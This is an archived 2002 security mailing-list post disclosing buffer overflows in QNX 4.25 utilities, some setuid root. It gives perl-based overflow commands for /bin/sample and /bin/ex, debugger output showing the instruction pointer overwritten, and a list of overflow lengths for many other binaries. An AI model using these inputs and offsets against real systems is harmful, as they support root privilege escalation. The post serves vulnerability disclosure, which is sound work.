madcr: QnX 4.25 - multiples bof in suid/no suid files

From: Egor Egorov (madratsat_private)
Date: Wed Jun 12 2002 - 05:10:46 PDT

Next message: Ismael Briones: "Part II: Vulnerability in 3Com® OfficeConnect® Remote 812 ADSL Router"

Previous message: gobblesat_private: "Remote Hole in IRC Client and Stuff"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) /bin/sample ----------------//------------------------------ # cd /bin # ls -l sample -rwsrwxr-x 1 root root 20639 Jan 19 1996 sample # sample `perl -e 'print "A" x 280'` Profile based upon 2000 samples/second. //1/bin/sample terminated (SIGSEGV) at 0005:00000041 %1 672 Memory fault sample $(perl -e 'print "A" x 280') # wd sample 'perl -e print "A" x 280'` ebp: 41414141 eip: 00000041 # wd sample 'perl -e 'print "A" x 280, "B"'` ebp: 41414141 eip: 00004241 ----------------//------------------------------ /bin/ex ----------------//------------------------------ # wd ex `perl -e 'print "AAA" x 420, "good", "CCC" x 280'` ebp: 00000041 eip: 646f6f67 - doog ----------------//------------------------------ file bytes for bof /bin/du - 558 /bin/find - 799 /bin/lex - 1673 /bin/mkdir - 517 /bin/rm - 351 /bin/serserv - 224 /bin/tcpserv - 146 /bin/termdef - 729 /bin/time - 2489 /bin/unzip - 299 /bin/use - 1964 /bin/wcc - 138 /bin/wcc386 - 137 /bin/wd - /bin/wdisasm - 135 /bin/which - 304 /bin/wlib - 256 /bin/wlink - 10244 /bin/wpp - 256 /bin/wpp386 - 256 /bin/wprof - 141 /bin/write - 157 /bin/wstrip - 817

Next message: Ismael Briones: "Part II: Vulnerability in 3Com® OfficeConnect® Remote 812 ADSL Router"
Previous message: gobblesat_private: "Remote Hole in IRC Client and Stuff"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jun 12 2002 - 10:00:54 PDT